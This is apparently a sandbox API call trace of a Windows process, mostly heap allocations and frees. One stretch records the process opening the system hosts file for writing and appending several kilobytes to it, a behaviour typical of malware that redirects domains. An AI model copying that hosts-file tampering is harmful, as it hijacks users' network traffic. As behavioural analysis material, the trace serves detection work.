RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1b90 [0130.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1bb8 [0130.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xd38) returned 0x2a2cc8 [0130.740] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a23f0 | out: hHeap=0x270000) returned 1 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1be0 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1c08 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1c30 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1c58 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1c80 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1ca8 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1cd0 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1cf8 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1d20 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1d48 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1d70 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1d98 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1dc0 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1e18 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1e40 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1e68 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1e90 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1eb8 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1ee0 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1f08 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1f30 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1f58 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1f80 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1fa8 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1fd0 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1ff8 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2020 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2048 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x13eb) returned 0x2a3a08 [0130.740] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2cc8 | out: hHeap=0x270000) returned 1 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2070 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2098 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a20c0 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a20e8 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x30) returned 0x285490 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2110 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2138 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2160 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2188 [0130.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a21b0 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a21d8 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2200 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2228 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2250 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2278 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a22a0 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a22c8 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a22f0 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2318 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2340 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2368 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2390 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a23b8 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a23e0 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2408 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2430 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2458 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2480 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a24a8 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a24d0 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a24f8 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2520 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2548 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2570 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2598 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a25c0 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2618 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x1dc3) returned 0x2a4e00 [0130.741] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a3a08 | out: hHeap=0x270000) returned 1 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2640 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2668 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2690 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a26b8 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a26e0 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2708 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2730 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2758 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2780 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a27a8 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a27d0 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a27f8 [0130.741] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2820 [0130.742] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2848 [0130.742] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2870 [0130.742] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2898 [0130.742] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a28c0 [0130.742] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a28e8 [0130.742] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2910 [0130.742] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2938 [0130.742] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2960 [0130.742] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2988 [0130.742] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a29b0 [0130.742] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a29d8 [0130.742] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2a00 [0130.742] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2a28 [0130.742] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2a50 [0130.742] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2a78 [0130.742] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a2aa0 [0130.742] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29ff28 | out: hHeap=0x270000) returned 1 [0130.742] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x18edb0 | out: pszPath="C:\\Windows") returned 0x0 [0130.746] PathAppendW (in: pszPath="C:\\Windows", pMore="System32\\drivers\\etc\\hosts" | out: pszPath="C:\\Windows\\System32\\drivers\\etc\\hosts") returned 1 [0130.746] CreateFileW (lpFileName="C:\\Windows\\System32\\drivers\\etc\\hosts" (normalized: "c:\\windows\\system32\\drivers\\etc\\hosts"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0130.747] GetFileSize (in: hFile=0xa0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x338 [0130.747] SetFilePointer (in: hFile=0xa0, lDistanceToMove=824, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x338 [0130.747] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x30) returned 0x285500 [0130.747] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x47) returned 0x2a0110 [0130.747] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x285500 | out: hHeap=0x270000) returned 1 [0130.747] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x6a) returned 0x2a0160 [0130.747] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a0110 | out: hHeap=0x270000) returned 1 [0130.747] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x9e) returned 0x2a01d8 [0130.747] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a0160 | out: hHeap=0x270000) returned 1 [0130.747] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xec) returned 0x2a0280 [0130.747] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a01d8 | out: hHeap=0x270000) returned 1 [0130.747] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x161) returned 0x2a0110 [0130.747] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a0280 | out: hHeap=0x270000) returned 1 [0130.747] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x211) returned 0x2a0280 [0130.747] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a0110 | out: hHeap=0x270000) returned 1 [0130.747] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x319) returned 0x2a04a0 [0130.747] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a0280 | out: hHeap=0x270000) returned 1 [0130.747] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x4a5) returned 0x2a07c8 [0130.747] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a04a0 | out: hHeap=0x270000) returned 1 [0130.747] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x6f7) returned 0x2a0c78 [0130.747] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a07c8 | out: hHeap=0x270000) returned 1 [0130.747] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xa72) returned 0x2a0110 [0130.747] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a0c78 | out: hHeap=0x270000) returned 1 [0130.747] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xfaa) returned 0x2a2e00 [0130.747] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a0110 | out: hHeap=0x270000) returned 1 [0130.747] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x17a1) returned 0x2a6bd0 [0130.747] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2e00 | out: hHeap=0x270000) returned 1 [0130.747] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x235f) returned 0x2a8380 [0130.747] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a6bd0 | out: hHeap=0x270000) returned 1 [0130.747] WriteFile (in: hFile=0xa0, lpBuffer=0x2a83a0*, nNumberOfBytesToWrite=0x1c76, lpNumberOfBytesWritten=0x18ed70, lpOverlapped=0x0 | out: lpBuffer=0x2a83a0*, lpNumberOfBytesWritten=0x18ed70*=0x1c76, lpOverlapped=0x0) returned 1 [0130.749] CloseHandle (hObject=0xa0) returned 1 [0130.751] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a8380 | out: hHeap=0x270000) returned 1 [0130.751] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29c118 | out: hHeap=0x270000) returned 1 [0130.751] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29c140 | out: hHeap=0x270000) returned 1 [0130.751] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29c168 | out: hHeap=0x270000) returned 1 [0130.751] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29c190 | out: hHeap=0x270000) returned 1 [0130.751] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29c1b8 | out: hHeap=0x270000) returned 1 [0130.751] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29c1e0 | out: hHeap=0x270000) returned 1 [0130.751] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29c208 | out: hHeap=0x270000) returned 1 [0130.751] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29c230 | out: hHeap=0x270000) returned 1 [0130.751] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29c258 | out: hHeap=0x270000) returned 1 [0130.751] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29c280 | out: hHeap=0x270000) returned 1 [0130.751] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29c2a8 | out: hHeap=0x270000) returned 1 [0130.751] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29c2d0 | out: hHeap=0x270000) returned 1 [0130.751] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29c2f8 | out: hHeap=0x270000) returned 1 [0130.751] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29c320 | out: hHeap=0x270000) returned 1 [0130.751] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29c348 | out: hHeap=0x270000) returned 1 [0130.751] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29c370 | out: hHeap=0x270000) returned 1 [0130.751] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29c398 | out: hHeap=0x270000) returned 1 [0130.751] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29c3c0 | out: hHeap=0x270000) returned 1 [0130.751] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29c3e8 | out: hHeap=0x270000) returned 1 [0130.751] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29c410 | out: hHeap=0x270000) returned 1 [0130.751] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29c438 | out: hHeap=0x270000) returned 1 [0130.751] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1618 | out: hHeap=0x270000) returned 1 [0130.751] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1640 | out: hHeap=0x270000) returned 1 [0130.751] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1668 | out: hHeap=0x270000) returned 1 [0130.751] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1690 | out: hHeap=0x270000) returned 1 [0130.751] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a16b8 | out: hHeap=0x270000) returned 1 [0130.751] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a16e0 | out: hHeap=0x270000) returned 1 [0130.751] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1708 | out: hHeap=0x270000) returned 1 [0130.751] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1730 | out: hHeap=0x270000) returned 1 [0130.751] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1758 | out: hHeap=0x270000) returned 1 [0130.751] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1780 | out: hHeap=0x270000) returned 1 [0130.751] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a17a8 | out: hHeap=0x270000) returned 1 [0130.751] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a17d0 | out: hHeap=0x270000) returned 1 [0130.751] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a17f8 | out: hHeap=0x270000) returned 1 [0130.751] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1820 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1848 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1870 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1898 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a18c0 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a18e8 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1910 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1938 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1960 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1988 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a19b0 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a19d8 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1a00 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1a28 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1a50 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1a78 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1aa0 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1ac8 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1af0 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1b18 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1b40 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1b68 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1b90 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1bb8 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1be0 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1c08 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1c30 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1c58 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1c80 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1ca8 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1cd0 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1cf8 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1d20 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1d48 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1d70 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1d98 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1dc0 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1e18 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1e40 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1e68 | out: hHeap=0x270000) returned 1 [0130.752] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1e90 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1eb8 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1ee0 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1f08 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1f30 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1f58 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1f80 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1fa8 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1fd0 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1ff8 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2020 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2048 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2070 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2098 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a20c0 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a20e8 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x285490 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2110 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2138 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2160 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2188 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a21b0 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a21d8 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2200 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2228 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2250 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2278 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a22a0 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a22c8 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a22f0 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2318 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2340 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2368 | out: hHeap=0x270000) returned 1 [0130.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a2390 | out: 